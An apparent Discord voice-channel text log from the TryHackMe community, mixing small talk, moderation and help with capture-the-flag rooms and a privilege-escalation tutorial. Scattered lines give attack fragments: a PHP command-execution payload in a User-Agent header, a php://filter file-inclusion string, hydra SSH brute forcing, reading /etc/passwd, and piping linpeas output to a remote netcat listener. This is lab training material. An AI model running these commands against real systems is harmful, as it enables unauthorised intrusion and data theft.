#voice-chat

and how can i enter?

!docs verify

@earnest sail You have to verify

ah, okay

done

thank you

@plucky vault use -T4

sure

hey!

sorry, text chat only atm

What's up? (:

@limpid badger 👋

hello bro

hey! (:

I can give it a try -- bare with

Ah okay. That's probably a result as how the rooms were split up

I'll take a look (: thanks!

Hehehehe if only 😛

I'd of had it a long time ago!

you get my thanks (:

btw could you find the binary "shiba4"?

Aye, I'm just deploying & having a look at it now

ok, maybe i am to stupid for that XD

I'm pretty sure that's been removed on purpose as it was a bit too challenging for the purpose of the room

but I'll double-check (:

ok, but then i cant finish the room

i need the password from the binary

@quiet needle thx for your time

anybody can help with this?!

no

😆

Let me check the IP that you've got deployed @plucky vault

@quiet needle go on bro , Nmap room

@plucky vault

The box is offline

offline?

how!?

I think that's one I've gotta apply a licensing fix too

Windows VM's will terminate after an hour if I haven't applied the licensing fix

Terminate and redeploy, I can't start those vulnerable instances from the back-end

The attackbox won't make a difference in this case @muted bridge

ls -al /usr/share/nmap/scripts/ | grep -e "ftp"

Yeah I have (: l know the issues. I'll have to make changes to the box which I've put on my to-do for early next week @limpid badger

I think you can actually. Skidy certainly can -- might be your perms?

Yeah it is (: I don't have total control over instances the VPC that vulnerable instances deploy in for users

Ah, fair

guzs

guy

can i get the password then from you?

i did the room before

but got resetted

It'll be the same as it is for zthlinux

but other than that you'll have to wait until I get the time to sort it out over the next few days I'm afraid

ok

i will just google it >D

😄

the shiba4 binary is definitely on the box that gets deployed in https://tryhackme.com/room/linux3 @limpid badger

Unless I'm understanding you wrong? 😅

i could not find it xD

and the test directory was there right? and the file inside the directory right?

test1234

yup (: I'm pretty sure that's on purpose

ok

You've just gotta find the binary (:

#room-help will be able to help out more^^

wuahhah

dont take my honor bro 😄

😄 thanks for asking though -- I can see how it isn't so clear so I'll see if I can make it a bit clearer in the task

You'd be very surprised at how well that works. Look like you know what you're doing and that you're supposed to be there...you're 95% of the way done @plucky vault

People assume you're in their best interest

😄

@quiet needle so are you interesting in Pentest?

I have a degree in cyber security & work at THM -- I think it's safe to say yes ahaha @plucky vault 😄

🤣 oh yeah

damn

I work full time @limpid badger so yeah a salary

pretty cool place to work for I gotta say

Sure

I started making rooms for THM as a community member

after a couple of good ones (the malware stuff), they invited me into the comissioned creators programme (where you get paid on rooms that you make)

was active in the discord as a community mentor and then got to moderator

after graduating from Uni, got offered the role I'm in at THM (:

that's basically a TL;DR 😄 ^

Yeah -- it's a great opportunity!

nice

I applied for a couple of red team & blue team roles that I was in the interview processes for

Dropped them once the offer from THM was given to me

75%+ of the content is free (:

Who is having issues subscribing?

Ah I see

Can I PM you a month voucher?

ahahaha

Ruby, I'll PM you shortly (:

Hope you find the subscriber content fun!

The resource boost that instances that you deploy get (i.e. more RAM = faster boot times especially for windows) and multiple attackbox deploys are worth it in itself

Let me know how you get on with the content @plucky vault (:

Good luck with your exams too

@quiet needle sure thanks

Feel free to show using NMAP on any vulnerable THM instance @dawn pond

Moderators/staff have no way of proving that you have got their consent (:

(even if you actually have)

Yes (:

I think I get what you mean

Well a) applications mostly don't care if there's actual routing between computers/devices - that isn't the application's responsibility to worry about

b) There are many services & background tasks running in Windows that will have network connections that you're seeing

i.e. windows defender ruleset updates, windows updates. Services including DHCP, WINS & netbios

The application will do all of that (encrypting, etc) before it's sent over a network. If it's actually sent -- it's not the application to determine

If that makes sense?

That'd be at both layer 6 & 7. It's only until Layer 4 where actual networking protocols are used -- that's way past the responsibility of an application

@quiet needle yeah i understand

at lest thank you for conforming my question

It's all good 😄 hopefully I understood your question right

Even in English it's very hard to explain technical things so don't worry

Definitely @plucky vault

Now that you've got a THM sub, check out my malware rooms (:

(plus at the risk of self promo: https://blog.cmnatic.co.uk/posts/so-you-want-to-analyse-malware/)

!rule 3

Rule 3: No excessive self promotion. Linking to another discord server is strictly prohibited, unless you have the infosec-developer role and the server is being linked as a resource to provide help with a specific tool (e.g. linking the Ciphey official Discord server for help with Ciphey). Don't turn it into advertising.

Yay, I got it right

Well here's the wider malware room: https://tryhackme.com/room/malmalintroductory

🤣 🤣 🤣 🤣 🤣 🤣 🤣 🤣 🤣 🤣 🤣

Oh Muirl (':

What did I do now

I'll remember that

Anyway, you get the idea @plucky vault xD

hall to @full sapphire

LOLLLL

The worst he can do is ban me from here -- suddenly that makes my to-do list a bit smaller 😄

Haha nope! I think that's Disqus 😂

fight back! 😄 i like that style 😄

The little comments section I think is what the JS file is (I hope oof)

Hahahaaha 😂

social engineering 101 😉

jkjk ofc

just proves how easy it is though huh

very scary

My site's static HTML so nothing's been compromised dw

no PHP 😄

Here's the malware rooms though if you're still keen (most are subscriber only)

cherrytree

IMHO https://tryhackme.com/room/malremnuxv2 is the most fun out of them all

You analyse malicious PDF's, MS office macros & analyse the memory of a machine infected with the Jigsaw ransomware

https://www.bleepingcomputer.com/news/security/jigsaw-ransomware-decrypted-will-delete-your-files-until-you-pay-the-ransom/

but that's just my biast opinion 😄

i save it for forther study , sure

malremnux and the mal introductory are the most hands-on rooms so far

Ahaah! 😄

Lucky it didn't encrypt all!

Hehe -- not necessarily!

I studied malware analysis for two years at Uni but that doesn't mean I'm safe from it

I'm very sure you know a lot more about other things that I'd be jealous about so don't worry @muted bridge

Hehehe 😄 I don't use the roles I have as bragging points at all

Nah, it's just being mature & modest about what you know

But I see your point 😄

You'll see people who are just 0XD G0Ds and much better pentesters then I am

It's all about perspective

Exactly 😅

I value myself on what I can confidently talk about rather than what my roles/position suggests

Why would you need to DNS Spoof? @dense ledge

Yeah, we're not gonna help you with that

Mods/staff have no way of verifying the permission that your "friend" may or may not have given you

At the risk of myself mini-modding

Thanks @dawn pond @plucky vault (:

Eh, I'm gonna say ex-mods are gonna struggle to minimod, with few exceptions

Please don't ban CMN. 🥺

i told you dude , i'm honest with myself and others 😄

yeah dont ban him

😦

i'm gonna crying..

😭

Best attitude to have (:

🤣

Don't we all...

dog0gy

Bug bounty seems like a lot of web app pentesting and oof

that's my worst topic 😂

Assembly 😄

@quiet needle bro in the linux fundamentals 3 on task task 12 there is text on the right side of the picture

but maybe it is only my resolution

do you have the same problem?

0101001

This? @limpid badger

yes

Fixed (: give it a refresh

nice find

thx bro your the best of the west

lemme see if I can sort out my microphone

would be awesome >:D

😄

@quiet needle your discord badges 😄

Where can I get support for my streak?

support@tryhackme.com

Thanks!

include your THM username as well please @night geode (:

have you seen this one
https://hackerone.com/reports/1031321

@merry spade

wait my mic has died

I've been muted for like the last 10 mins LMAO

bare with

https://youtu.be/tR_6dibpDfo

@quiet needle

Ah wicked! I'll give that a check

P@ssw0rd

C0ff33$

nice

Copy that url and replace that digit with FUZZ and try wfuzz attack

@hidden marten

wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 "http://" Your_Machine IP/and continue your url

@hidden marten

try sha1

wanna play koth?

@bright wyvern this is what we are seeing:

that should be better

sry we don't know

both anonymous

@lofty moat wonna vc later?

sure, when you want to?

when i catch sleep

and then wake up

ok

idk time is wierd

today i think tho

🤔

the prizes are also good for the event. 1st prize is 500$ and 2nd 250 , 3rd 100$

also lots of other stuff with it

https://tryhackme.com/jr/hackerofthehill

For details ^

@plucky vault ^

If you guys are still in VC in like an hour or so I'll hop in (:

yesir

hi

https://tryhackme.com/room/uploadvulns

how to update tryhackme level on this server

@lofty moat nice rank

can you teach me

🙂

save way you verified yourself with the bot

it is updated every 24hours but if you want to do it manually you can do it

ya I verified

How to do it manually brother

?

!verify YourDiscordToken to @trim cloud bot

ok

so your level can be updated

thanks

and another thing

can you teach me

😦

about tools

which one specifically?

web exploitation

https://tryhackme.com is a really great resource 😛

and privilage escalaltion

especially

dammm

i was not knowing

https://tryhackme.com/room/linuxprivesc
https://tryhackme.com/room/linuxprivescarena
https://tryhackme.com/room/windowsprivescarena
https://tryhackme.com/room/windows10privesc

free?

yeah

hydra -l [user] -P [passwords] ssh://[IP] -t64

ssh ^

also -L if you are using users list

/var/log/apache2/access.log

wait I think I just used rockyou for that machine @bright wyvern

find / -name rockyou* 2>/dev/null

so it will match the .txt or .txt.gz at the end

thank you!

help me

@dawn pond with?

@dawn pond Please read the server rules -- rule 1 specifically. Here is fine 🙂

how do I join general voice

!docs verify

tks 🙂

hellow @glacial crater @plucky vault

hi

1sec

on a call

im gonna finish a box i started last night

okok

im very new

im doing linux findamentals pt3

fundamentals

very nice!

can you stream?

if you cant you have to get verified

Yes, ill join in a sec, just finishing a call

what did u say Bodiless

say again sry

Hi

Testing the new piano plugin with some good old beethoven

its as close as I could get it to 0 dB difference in the retrack so it should sound good with any headphones

@dawn pond Why are you looking up free proxy lists for proxychains?

doing good thanks @limpid badger and you?

hehe yeah! All you can ask for these days 😄

glad to hear it

Doesn't sound familiar no 😦

Ah good stuff @hasty dragon 👍

ty for letting me know

I'll catcha later @limpid badger keep well (:

hey hey (:

.

@plucky vault why are you so quiet 😆

KoTH 👀 👀

Red Teaming is all about being quiet 😉

https://tryhackme.com/feedback

yeah

.

SEECUL MAP

SEAGULL MAP

seekool map

@stuck juniper press the button

or what

press it

Just do it

oh no

What was that, Merc?

I'm sorry

I didn't mean it

whatever I've done

;-;

he did not press it

failed his speed run

reset incoming

wat

@plucky vault 👋

@plucky vault switch the damn lights on

Please refrain from the swearing :)

Can't be doing that here, regardless of testosterone overflow.

lol , a separate channel for you to swear 🤣

That'd be network chucks discord you can venture to then :)

Purely pg13 env unfortunately.

Darksec too. That place exists.

i find this so funny lol

Sweet child. Please understand.

You must see things for what they are.

See past the flesh.

I appreciate the silver tongue :)

pg

13

mate

Nicholas , are you bored or something who is messing up for no reason

It's highly suggestive. Cmon mate. Please prevent me from having to do my job.

Come visit Darksec.

lolllll

You know what you did!

That doesn't work here :)

I'll hire James.

ezpz

Nicholas hire me

i will fight with you

Get. In. Darksec.

😎

:D

Creativity lmao

Say it in base64

Wat

https://i.imgur.com/FimX2DB.png

He has a memes channel.

varg , allowed to swear in base64 ? 🤣

:3

http://admin.tryhackme.com/discord-servers/18+

There

Bloody hell

lmao

HAHAHAHA

You know why I love you, nicholas?

Because you're too confident.

<3

oml

No

You cant

You cant have fun here dude.

your the craziest guy i ve seen in general voice bruh ,

Bold of you to assume you have to be "qualified" to get mod.

In any capacity.

No.

Just how to partially tie your shoes.

Do you use velcro?

No shame.

a little shame

You ought to be admin.

Yea feels like public speaking session

Am attending lecture rn

Yea..with my airpods on

You're definitely eligible for moderator role

Ya that definitely boosts

😂😂😂😂 damn...am gonna burst into laughter

Will you catch you later mate

it baking night tonight

bee, where are the women at

on god

Well boys no more vc for me

curl -H "User-Agent: system($_GET['cmd']"

@brittle sinew I moved you to AFK as the study channels are for people studying.

@manic canyon can you move me in pweez <3

Join a chat and I'll drag you in

Can you please drag me to Small study room?

https://www.twitch.tv/sshhoneypot

that is one big small study room

Want me to pull you in?

yeye

plox

aw man.. the small study room seems comfy.. too bad I'm still working

Pull me in too

https://null-byte.wonderhowto.com/how-to/recon-research-person-organization-using-operative-framework-0176323/

that I believe

redteamchallenge.eu

owasp juice room

dvwa

https://tryhackme.com/games/koth/18517

@torpid badger we could not hear you bro

T-T

my mic is don't good

i don't have money forbuy one good

😦

😦

maybe try to join with your mobile phone 😉

@torpid badger

my phone don't is good to

it sh** hangs

😦

you can always mute and type

If you're going to censor your swear word, don't swear at all :)

I do that all the time

;-;

sorry

sudo apt update

apt-get is deprecated

https://tryhackme.com/room/sudovulnssamedit

wall

https://www.exploit-db.com/exploits/47995

https://tryhackme.com/room/sudovulnsbof

If you want to practice that one

Ah thanks Muiri

we just had fun when we realised it worked on the Food koth room

What happened

Can I help u

did you not see it

Laughing a lot man

I saw that

https://tryhackme.com/room/tonythetiger

brb

Bruh

That font

no coffee

barely alive

https://tenor.com/wyo4.gif

https://tenor.com/bhLno.gif

no coffee me gone

@plucky vault #site-support message

#site-support message

@plucky vault https://cdn.discordapp.com/attachments/701206362645856335/789759105355087872/Gmod_Dance.mov

@unkempt minnow i realy like your voice man

your accent is british 🥺

😍

Merci 🙂

@unkempt minnow May I DM?

Sure 🙂

blackout seems to be getting better with his geography, must be studying

@heady dew Done 😄

Thanks 🙂

@unkempt minnow whys general so hot 🙂

Cos we are all playing Geoguessr with Blackout

oh

I bought him Premium a couple weeks ago so we could play the Battle Royale mode

many people talking . cant understand anything 🤣

It's fun, Come join in

You just gotta guess the country

okay

country?

oh I played quess city

Saudi Arabia

or iran

@unkempt minnow I keep getting disconnected

Slow connection

:/

Oh 😦

I don't know how to fix that

Another time I guess

I hope so

When was teh community meet

Is that look like a rabbit hole?

@unkempt monolith try running gobuster in the perm denied directories

yes ig

@formal garnet Where to run gobuster?

try running in all web dirs

which tool is that @unkempt monolith

Its mine Im still working on it you want to try it?

yea sure

https://github.com/soundtrack505/ctf_lazy_script

ty

Let me know if there is a problem or adding more stuff 😄

sure

wanna come in dms or it will become spoliers

What?

ill tell in dm

Okay

mind if i ?

No sure

give 60 threads at least

How can I make it equal to 9

5+4=9 lmao

lol tryed that xD

tried that'

damit

I mean.. I dont see anything on the code that tells me that it will redirect me or something

exactly

Okay so I think the pattern is 1,2,3,4,5,6,7,8,9

something like that

which room are you solving?

new one enpass

what did you say?

huh?

your first word length is 2

yea

for 8th word is 3

21001123?

we tried it

but is it like a know word or I can make something up

ig you have to make it

Its two stages if we have val[0] and val[8] right we need the second phase

can you share the code like in dm or hold the screen for a minute

yeah

we were talking abt it long lol

Is helping each other here considered giving hints?

not hints

we r figuring out ourselves lol

@plucky vault You got it?

boolean value of $i?

ur 0xd u can figure it out 🥳

what?

If $sum == 9 the boolean is True

so we need to get there some how

20001123

this sum is 9

and follows the order

hmm

nope

It needs to be separated with ,

But how can we enter a character of length 0

try goin in tthe /zip n view the s

mm

0

"He","", like this??

hmm yea mybe

zip also try some guessy numbers and view them

ohhh

we have strings in hereeee

oh yea sadman was on the index.html as well

oh dame

if u open $ip:8001 u still see sadmna

try enternin sadman in reg.php

value of i = i+1

can that gib some help?

31112234

Enter a blank string ""

@unkempt monolith this loop

yeah

the sum is not 9

idk how bypass

oh so it has to be loop 9 times?

but hey the user flag hint says the ssh file u found

@@,$,$,*,$,!,$,!,@@@ can you try this?

nice man!!!

Ill back later

did it work?

wut u stream?

@hidden marten

@plucky vault damn that worked can u tell me how?

!preg function stated that we don't have to give any alphabets or digits in the title

To get inside the if loop

And then I followed what if commands needs to bypass

Like on val[0] length of string should be 2

And so on

Thanks to @past sail on highlighting the "!" on preg function

ok thx didnt understand tho

@plucky vault and did u found the user?

need help neo in user

@plucky vault u there?

sandman is the user ig

sandman or sadman

Whatever was given in that zip files

i always get perm denied

That is the username

not working

its not workin

@past sail which ?

room

Im on En-Pass

yea im streaming that

can u help for the user

i got the passwd in /reg.php

Your stream doesn't show anything btw, and i would like to find out myself ^^

oh it doesnt

im stuck wanted help lol

Wait for the 13th for hints

yup

lol

@slender kayak https://public-firing-range.appspot.com/ might be interesting for you

@lofty peak Can I ask why are you writing that sample code?

because i dont know anything about coding . ?

you understand this code ? please explain me once i write it completely

It's basic php...it's just accepting what you write as a input and execution is done

really ?

wait

wait

yea now tell

oh

whats meant by that stuff

oh

Yes...basic way of accepting inputs in get parameter

Can I DM u

Yea sure you're OxC guru man

Ok

yo , whats meant by

What user is this app running as?

?? where?

uh , no i found it

am impressed 🙂

@plucky vault you wanna play a koth ?

Na...gtg

@limpid badger nothing much

wbu

tell us some good story

anything

experience

you done with your education ?

where you from

oh , cool

INDIA , yes 🙂

me?

you kind of sound like arabian 😄

Sri Lanka

😂 not arabian

your voice is very bold .

i am talking to animo 🙂

i am having coughf

corona 😆

oh sorry

lol

so how was corona time for you , @limpid badger

hi animo whats up?

oh , how a goood internet connection in a village

🤣

yea i am here

was busy koth

😉

yea so

village

you have a hint

what was it

hwos that possible

ohhh

is it cold at your place

😄

@earnest parrot you dont at all sound nepalian

@stuck juniper what room are you doing 🙂

the room Tetris

hardest one I've done so far

oh

i dont see the room

This is fire

oh I was just joking @lofty peak, me and Nox were just trying to speedrun the game Tetris

hello guys

The person who is streaming rn...can you share your wallpaper or provide me the name of that image @earnest parrot

are you unavailable to talk? @echo badge

Hmm, I don't really comfortable using vc 😂

ah okay, man

You can try it on the game, but I don't have enough batteries left

I've played it before

Only once though

Probably not a tty shell, that's why you can't see the process

I did see while loops process but idk if it's because the loops is background process

Oh, I don't use while loops because it's slowing down the box

Simple binary for write file

I think payloadallthethings is good

Okay then, that was fun

👍

Any plans for India?

Yep THM is a UK company

I'm not british 😄

@plucky vault beard

@plucky vault glasses suit u 🙂

https://www.youtube.com/watch?v=XTaKWdIdg8g I always like to link to this presentation from DEFCON

should be useful for some wreathing 😛

dialup noises

@quiet needle 👉 👈

@rough flax ❤️

but

but

muted

afk, making dinner

@echo badge you want to do a Koth?

<?php echo system("ls") ?>

which room is this??

Archangel

php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

try this

after view=

@barren heart

wtf

I was asleep and forgot that I join voice chat

ahh very nice

I was just saying how you were my koth mentor

❤️

@plucky vault Please do not post discord links.

@echo badge psst

Aye

damn you were up late

I was wondering if you wanted to do a koth @echo badge :(

Well, you're on the other side of the earth 😂

that is a very good point

ping me if you wanna do one today 😂

@fallow brook we're voice suppressed :(

@manic canyon will we be able to ask questions or no?

I'll assist on minor questions if we get bogged down in too many 🙂

in text 🙂

Jabba is the voice god

oooh.. chuin is here

halo

howdy chun

When in doubt, enumerate. (thats why spy planes exist)

Good morning. 🙂

It can be throttled down for pentesting...

💯 do things slow, automate and accelerate only after you fully understand why you're doing it.

understanding is key

rustscan has the ability to cause DOS to a server as it's so freaking fast

so be careful with it, especially if you're going to use it in the real world

just use min-rate in nmap

rustscan can give u some false positives

just like -T5 in nmap

generally, the faster the tool goes, the more likely the chance of false negatives/positives

Since I'm new here, is this tutorial session conducted often? I feel like subscribing the premium now 😮

Welcome to the party Tatsuya 🙂

apropos is a good tool for searching man pages as well @manic canyon, if they're offline 🤷‍♂️

Thanks, I'm subbing within the next 24 hours after my card gets unblocked 😄 Feels damn good to be here

And it happens IRL too. A bug hunter friend of mine found an open anonymous login FTP with passports in it.

if it looks like a default lib, it's probably a default lib

feroxbuster!

Once again, when in doubt (nothing special in index), enumerate. This just iterates on that.

dirsearch>ffuf>wfuzz

dirbuster wordlists, you also have seclists which is amazing

✨ directory-medium list is outdated ✨

works for most of the ctfs

raft is better :L

has .git etc.

i prefer common.txt

🤷‍♂️ seclists, use them all untill you find it 😛

you can specify threads with gobuster, default is 4 but I think it can go up to 64

although

webserver might die 🦀

good for blooding though

or you might start dropping connections..

-t 200 with dirsearch with no problem

depends on your machine's networking (like rustscan too) more than anything else. feroxbuster is so fast it can get confused sometimes

is this being recorded at all so i can watch it again later?

i like ffuf let it run normally

It was giving you a 301, because it says it's moved to the directory (/images becomes /images/)

I use feroxbuster and ffuf depending on what I feel like / works better for my target scan

Afraid not 🙂

(I’m recording)

We recorded the Event on Thursday night, but these aren't recorded unless Jabba is using OBS

Ok, it's recorded 😆

Can I please have the youtube channel?

because Jabba is awesome 😄

Make sure there's a disclaimer about that btw

I’m only recording my microphone and my screen, Did not think I needed a disclaimer

Yeah, should be good -- just for anyone who gets unmuted to ask a question 🙂

Jabba's Tutorials: Recorded in front of a live Discord audience

<insert clap soundbite>

Me trying to find where Jabba uploads videos 😦 🌐

It allows you to mess with HTTP Requests

Web proxy 🙂

does this tutorials happen daily?

I nearly yelled "JABBA IN DA HIZZY" not realising I am not muted in there by default lmao

No, this is the first time 🙂
We might start making a habit of it if Jabba / anyone else is game though

This seems to be going down well

I'll probably be doing a few in the future as well, following on jabbas footsteps 🙂 Probably have a few specific study topics.

If happily do some :)

That's what this VC is for! 😁

Muir, I will paypal you $10 if you say "PANTS" loud enough that it is very clear to us all in here, with mic unmuted.

will the tutorial then be uploaded on discord as well?

(Mods and mentors are not muted in there, so feel free to use at will)

If Jabba sends over the recording, we can probably arrange that 🙂

i might do some binexp stream 👀

cool, thanks

$20

Yeah I am not offering more to just say a word lmao

£20 and a lion bar

^

Right, I'm off to walk the dogs. Have fun!

<3

pentester-monkey shell?

in a real world situation if the "upload file" screen came up, wouldn't the owners be notified of an attempted upload?

it depends on the service too, some services have so many uploads going on anyways that it could be missed because of noise-to-signal ratio

It'll depend on your scope, since we're all ethical hackers here 😄

lnvp > lvnp 😛

I'm lazy, I only half-stabilize

python method ftw

stty raw -echo; makes the special keys (Ctrl+C , Ctrl+Z) work 🙂

arrow keys too!

That and often we add custom headers to http requests to identify our trash so as not to pollute logs. IRL (one such example is the Verizon Media BBP)

reports are the final product after all

updog best dog

What's "the example is the Verizon Media BBP"?
Any incidents?

No, their bug bounty program just requests that you use a very specific Header in all your traffic to avoid getting you in trouble, and so they can filter out their logs.

if you don't use it, you can get banned from the program.

./linpeas | tee linpeas.out so it can be stored for later use

And the Big PEA banner makes me happy...

Oh, I see! like X-Bug-Bounty:.

exactly Xia 🙂

Another useful script is pspy

. /linpeas.sh -a | nc IP PORT
Then listen on ur machine and send it to a file for later

pspy logs executed processes, so you can identify hidden cronjobs (like root cronjobs)

that's a very OSCP looking strategy 😄

It's very handy, espically when u need to go over it again or the box dies

aye

and you can keep everything organized on your local folder

Get all the info u can onto ur own machine. A lot easier to go over it

we see it

owner group all

suid allows you to temporarily set your uid to the owner of a file, so that's why you need -user root there. (in case there were other SUID files)

but it can be removed to search for SUID for all users

to gtfobins!

anyone else getting a bit of crackling from jabba's audio now? or is it just my discord?

(could be just me)

nah

move along, thanks 🙂

gd for me

And it focus on the vulnerability, not on exploitability

effective uid = root

🎉

Great job jabba, you did a good job. kept it simple 🙂

Thank you for the great tutorial 😄

thanks for the tutorial. New to them

U smashed it mate

Oh most def coming to more now

U are awesome tutor man @manic canyon

I'll add a question then: In the systemctl payload, why didn't you just execute "/bin/bash" there

/bin/bash -p to execute correctly

Thank you very much for the tutorial!

there's many ways to skin a cat

yup

@manic canyon When you take a note, what kind of troubles do you prepare for? I often overlook something...

or a netcat

or a pwncat

or a socat

or a... you get the point

Everything spins off of enumeration.

if you take a step by step approach on everything you see from your enumeration, you wont miss too much.

Thank you for the wonderful session @manic canyon, I'd like to know where the recording is hosted 🙂

if you are missing something, it usually means you need to enumerate more

services will inform what vulnerabilities to test for, etc...

got it. Thanks for kindly advice!

The recording should be posted on YouTube and released soon :D

ofc, that's not always obvious, specially with web services.

Channel plox, I'm new here!

and if you find an http you look for a CMS and if you find one you search for vulnerabilities in that. Otherwise you start testing OWASP top 10 etc..

Awesome job Jabba.

I'll gather some courage to do some too 🙂

I want to guide ppl to do some bofs 😄

I'm not sure if THM has an official YouTube channel but it will most likely go on there if there is one

@manic canyon 👍 will do

We need more of Jabba in here! Its lively!

https://tenor.com/view/baby-yoda-weeee-happy-excited-happy-dance-gif-19273815

seeya

@manic canyon thank you sir

hi guys

🙂

@unkempt minnow its night . call some people and do a lecture 😄

brb.

trying to figure out how to get on voice with some crazy stuff going on with my music interface...

oscp

exam tips in 2021

https://johnjhacking.com/blog/the-oscp-preperation-guide-2020/

ty

https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/

https://www.youtube.com/watch?v=1S0aBV-Waeo
Great visual view

https://muirlandoracle.co.uk/2020/12/06/oscp-thoughts/

Zoija - Hackerista

#general message

@forest python Opinion on Chicken Burgers? ^^

lil dark but that could be the light. looks super crispy and craggly so yum

Animo says it's the 'Best in the World'

with cornflakes

It's covered in kellogs cornflakes

They're grrrreeeaattt

I make this often (not my pic)

it's good 😄

chicken Saltimbocca

rouladen

moo

the turkey with bacon and rosemary

and pomegranate juice

Hi

hi

Why i can’t join the vc

!docs verify

Ok tnx

cat /etc/passwd | wc -l
cat -n /etc/passwd

port: "5900" authentication disabled

@fallow brook Opa

the names in polish look like hash

Magna you alroit mate?

https://www.pdq.com/

^PDQ for remote deployment and monitoring. Good pricing IMO

@fallow brook I look away for 1 second :C

szy ive never seen so many tabs in my life

https://flipperzero.one/

Has someone been on tutorials since yesterday?

-0-0

any room suggestions?

Just a render of ibi's song from his yt but redone with a concert piano

pickle rick

@plucky vault PubgBOY

@plucky vault whats your THM bro ?

😚

привет

@plucky vault English please 🙂

ok

no russian

ты русски?

бот орошхо

ill stop

how are you today

good im guessing

im kind of bored

no russian whatsoever got it!

so how are you again

fine Im guessing

yummmmmmm!

@plucky vault you can also do dir

dir works in ftp ig

@plucky vault ask him to try it once .

Thanks for reminding me about this

🙂

@lofty peak you're playing koth again?

yup 🙂

😆

you were about to teach me @lofty peak

ahh , 😆 . yea lets do it

he wont , patching

@lofty peak can i dm you if you dont mind?

yea sure 🙂

WHY GENERAL CHAT IS LOCKED ?

Because we don't want people being able to just join with no protective measures

!docs verify

!docs verify